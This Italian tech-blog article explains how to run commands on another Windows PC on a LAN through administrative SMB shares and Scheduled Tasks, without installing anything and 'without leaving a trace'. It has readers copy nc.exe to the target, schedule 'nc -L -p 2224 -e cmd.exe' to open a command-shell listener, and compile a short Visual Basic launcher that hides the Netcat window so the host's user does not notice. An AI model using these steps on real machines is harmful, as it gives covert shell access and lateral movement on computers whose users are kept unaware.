www.MegaLab.it

Quando accediamo alle condivisioni di un altro PC in LAN (\\IndirizzoPC), il protocollo SMB (ossia Condivisione file e stampanti per Reti Microsoft) ci permette di esplorare il contenuto delle cartelle condivise e di copiare/aprire gli oggetti che sono condivisi.

Con questo articolo voglio spiegarvi un trucco per poter non solo esplorare le risorse condivise, ma eseguire anche comandi e avviare programmi su un altro host nella propria LAN, sfruttando lo stesso protocollo.

Beh... fino a qui parecchi possono pensare che la cosa sia simile a VNC o Desktop Remoto, ma il vantaggio di questo procedimento sta nel fatto che non è necessario né installare né configurare nulla sul PC da controllare: in parole povere si fa tutto "da remoto", senza lasciar traccia ed in maniera più "silenziosa" del Desktop Remoto.

L'unica cosa necessaria sono i privilegi di Amministratore.

Cominciamo accedendo alle risorse condivise dell'host da controllare: ammettiamo che il suo indirizzo sia 192.168.1.3, quindi in Start - Esegui scriveremo \\192.168.1.3.

Visualizzeremo ora le cartelle condivise dell'host, apriamo quella di nome Operazioni Pianificate.

Clicchiamo con il pulsante destro su un punto vuoto della cartella e scegliamo Nuovo.

Aquesto punto verrà creato un nuovo file; apriamolo e avremo di fronte questa finestra:

Ora sul campo Esegui scriveremo il nostro comando da impartire o l'applicazione da aprire, sul campo Esegui come, assicuratevi che ci sia scritto il nome dell'host \ utente di quell’host.

Sinceriamoci che sia abilitata l'opzione Attivata

Ora spostiamoci sulla scheda Pianificazione:

Impostiamo la pianificazione in Una sola volta e selezioniamo il giorno odierno; per quanto riguarda l'ora di avvio dobbiamo impostarla un minuto avanti all'orario corrente (così il comando verrà eseguito tra un minuto), clicchiamo su Applica, poi OK ed il gioco è fatto: tra un minuto l'host eseguirà l'operazione da noi impartita e soprattutto l'operazione verrà eseguita a nome dell'altro utente.

Creiamoci direttamente una Shell

Oltre ad eseguire un comando, grazie a questo trucco possiamo anche aprire una finestra di comando: per farlo ci viene in aiuto il buon vecchio Netcat. Scaricabile da qui

Scompattiamo l'archivio e copiamo il file nc.exe nella cartella Windows dell'host, tale cartella è sempre condivisa per scopi amministrativi e si può raggiungere così: \\192.168.1.3\c$\Windows

Ovviamente l'indirizzo IP è quello del vostro host da controllare.

Ora torniamo nella cartella Operazioni Pianificate dell'host, creiamo una nuova operazione come prima, ma nel comando da eseguire scriviamo nc -L -p 2224 -e cmd.exe .

Questo comando impone a Netcat di mettere in ascolto cmd.exe sulla porta 2224: in questo modo, noi potremo connetterci a tale porta con un terminale testuale (Telnet, PuTTY.. ecc). Ci risponderà cmd.exe, e potremmo quindi eseguire i comandi dos nell'host remoto.

Ricordatevi di impostare l'orario dell'operazione pianificata un minuto avanti all'orario corrente; clicchiamo su Applica, OK.

(Aspettiamo un minuto, il tempo che l'host esegua l'operazione....) e come potete vedere nell'immagine qua sotto, collegandosi alla porta 2224 dell'host avremo un accesso diretto ad esso tramite interfaccia a linea di comando; potete quindi impartire i comandi testuali come se vi trovaste fisicamente di fronte al terminale remoto

Però Netcat nell'host non viene eseguito in modalità nascosta: alla sua apertura compare una finestra, e questo potrebbe risultare scomodo, specialmente se in quel PC ci sta lavorando un utente.

Per eseguire Netcat in modalità nascosta possiamo realizzare un Launcher, ossia un programma che esegua Netcat in maniera invisibile; ovviamente nell'operazione pianificata dovremmo impostare l'esecuzione del Launcher (e non direttamente Netcat)

Il Launcher si può scrivere in tre righe di Visual Basic, utilizzando l'istruzione Shell:

Private Sub Form_Load () Form1.visible = False Shell ("nc -L -p 2224 -e cmd.exe"), vbHide Unload Form1 End Sub

Creiamo l'eseguibile, denominiamolo ncLauncher.exe e copiamolo nella cartella Windows dell'host remoto (dove avevamo precedentemente posizionato nc.exe).

Ora andiamo a creare la nostra operazione pianificata nella stessa maniera di prima, ma come comando da eseguire impostiamo ncLauncher.exe. (Ricordiamoci ancora di impostare l'esecuzione un minuto avanti all'orario corrente).

Così viene eseguito il Launcher (in modalità nascosta) che a sua volta esegue Netcat (anch'esso in modalità nascosta). E noi abbiamo la nostra shell "spawned" nascosta senza disturbare l'utente dell'host.